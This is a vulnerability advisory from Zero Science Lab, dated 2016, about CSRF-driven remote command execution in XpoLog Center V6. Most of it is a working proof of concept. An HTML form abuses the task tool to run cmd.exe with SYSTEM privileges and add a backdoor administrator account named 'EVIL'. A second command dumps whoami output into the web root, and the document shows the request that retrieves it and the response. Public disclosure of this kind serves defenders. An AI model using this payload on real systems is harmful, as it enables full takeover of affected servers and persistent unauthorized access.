XpoLog Center V6 CSRF Remote Command Execution Vendor: XpoLog LTD Product web page: http://www.xpolog.com Affected version: 6.4469 6.4254 6.4252 6.4250 6.4237 6.4235 5.4018 Summary: Applications Log Analysis and Management Platform. Desc: XpoLog suffers from arbitrary command execution. Attackers can exploit this issue using the task tool feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF an attacker can execute system commands with SYSTEM privileges. Tested on: Apache-Coyote/1.1 Microsoft Windows Server 2012 Microsoft Windows 7 Professional SP1 EN 64bit Java/1.7.0_45 Java/1.8.0.91 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5335 Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php 14.06.2016 -- exePath = "C:\windows\system32\cmd.exe" exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add" <html> <body> <form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST"> <input type="hidden" name="" value="" /> <input type="hidden" name="csrfToken" value="NoToken" /> <input type="hidden" name="taskId" value="1465930398522" /> <input type="hidden" name="taskType" value="exe" /> <input type="hidden" name="name" value="CCMMDD" /> <input type="hidden" name="description" value="ZSL" /> <input type="hidden" name="IsSsh" value="false" /> <input type="hidden" name="exePath" value="&quot;c&#58;&#92;&#92;windows&#92;&#92;system32&#92;&#92;cmd&#46;exe&quot;" /> <input type="hidden" name="exeArgs" value="&quot;&#47;C&#32;net&#32;user&#32;EVIL&#32;pass123&#32;&#47;add&#32;&#38;&#32;net&#32;localgroup&#32;Administrators&#32;EVIL&#32;&#47;add&quot;" /> <input type="hidden" name="exeEnvVar" value="" /> <input type="hidden" name="exeWorkDir" value="" /> <input type="hidden" name="exeOutputTargetFile" value="" /> <input type="hidden" name="NameXpoTaskSched" value="taskId&#95;1465930366962" /> <input type="hidden" name="IdXpoTaskSched" value="taskId&#95;1465930366962" /> <input type="hidden" name="actionIdXpoTaskSched" value="0" /> <input type="hidden" name="StateXpoTaskSched" value="1" /> <input type="hidden" name="schedulerSuffix" value="XpoTaskSched" /> <input type="hidden" name="trigTypeXpoTaskSched" value="cron" /> <input type="hidden" name="minutesXpoTaskSched" value="0" /> <input type="hidden" name="minutesEndXpoTaskSched" value="0" /> <input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" /> <input type="hidden" name="frequencyXpoTaskSched" value="daily" /> <input type="hidden" name="DayInMonthXpoTaskSched" value="all" /> <input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" /> <input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" /> <input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" /> <input type="hidden" name="hoursXpoTaskSched" value="0" /> <input type="hidden" name="hoursEndXpoTaskSched" value="0" /> <input type="hidden" name="hoursOnce0XpoTaskSched" value="&#45;1" /> <input type="hidden" name="minutesOnce0XpoTaskSched" value="&#45;1" /> <input type="hidden" name="secondsOnce0XpoTaskSched" value="&#45;1" /> <input type="hidden" name="jobPriority" value="&#45;1" /> <input type="hidden" name="ajaxTimestamp" value="1465930905166" /> <input type="submit" value="Submit" /> </form> </body> </html> -- exePath = "C:\windows\system32\cmd.exe" exeArgs = "/C whoami > c:\Progra~1\XpoLogCenter6\defaultroot\logeye\testingus.txt" GET http://10.0.0.17:30303/logeye/testingus.txt Response: nt authoritysystem